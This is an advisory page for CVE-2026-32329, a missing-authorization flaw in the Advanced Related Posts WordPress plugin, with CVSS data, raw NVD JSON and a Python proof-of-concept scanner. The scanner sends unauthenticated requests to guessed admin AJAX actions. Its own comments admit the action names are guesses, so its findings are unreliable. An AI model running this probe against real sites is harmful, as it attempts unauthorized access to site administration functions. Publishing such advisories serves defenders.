Security Vulnerability Report
中文
CVE-2026-32329 CVSS 5.3 MEDIUM

CVE-2026-32329

Published: 2026-03-13 19:54:43
Last Modified: 2026-04-22 21:30:26

Description

Missing Authorization vulnerability in Ays Pro Advanced Related Posts advanced-related-posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Related Posts: from n/a through <= 1.9.1.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Advanced Related Posts <= 1.9.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests import sys # CVE-2026-32329 PoC - Missing Authorization in Advanced Related Posts WordPress Plugin # Target: WordPress site with Advanced Related Posts plugin <= 1.9.1 def check_vulnerability(target_url): """ Check if the target WordPress site is vulnerable to CVE-2026-32329 This PoC attempts to access admin functionality without authentication """ # Common plugin endpoints that might be vulnerable endpoints = [ '/wp-admin/admin-ajax.php', '/wp-json/wp/v2/settings', '/wp-content/plugins/advanced-related-posts/', ] # Vulnerable parameter patterns (example based on typical WordPress plugin structure) # Actual vulnerable endpoints should be identified through source code analysis vulnerable_params = [ {'action': 'advanced_related_posts_get_settings'}, {'action': 'advanced_related_posts_save_config'}, {'action': 'advanced_related_posts_export_data'}, ] print(f"[*] Testing target: {target_url}") print(f"[*] CVE-2026-32329 - Missing Authorization in Advanced Related Posts\n") for endpoint in endpoints: url = target_url.rstrip('/') + endpoint print(f"[*] Testing endpoint: {url}") try: # Test unauthenticated access to admin functions for param in vulnerable_params: response = requests.get(url, params=param, timeout=10, verify=False) # Check if response indicates successful unauthorized access if response.status_code == 200: if 'success' in response.text.lower() or 'config' in response.text.lower(): print(f"[!] Potential vulnerability detected!") print(f"[!] Endpoint: {url}") print(f"[!] Parameter: {param}") print(f"[!] Response indicates unauthorized access possible") return True except requests.exceptions.RequestException as e: print(f"[-] Request failed: {e}") print("[*] No obvious vulnerability indicators found") print("[*] Manual verification recommended") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python poc.py <target_url>") print("Example: python poc.py http://example.com") sys.exit(1) target = sys.argv[1] check_vulnerability(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32329", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:43.230", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in Ays Pro Advanced Related Posts advanced-related-posts allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Advanced Related Posts: from n/a through <= 1.9.1."}, {"lang": "es", "value": "Vulnerabilidad de Autorización Faltante en Ays Pro Advanced Related Posts advanced-related-posts permite Explotar Niveles de Seguridad de Control de Acceso Incorrectamente Configurados. Este problema afecta a Advanced Related Posts: desde n/a hasta &lt;= 1.9.1."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/advanced-related-posts/vulnerability/wordpress-advanced-related-posts-plugin-1-9-1-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}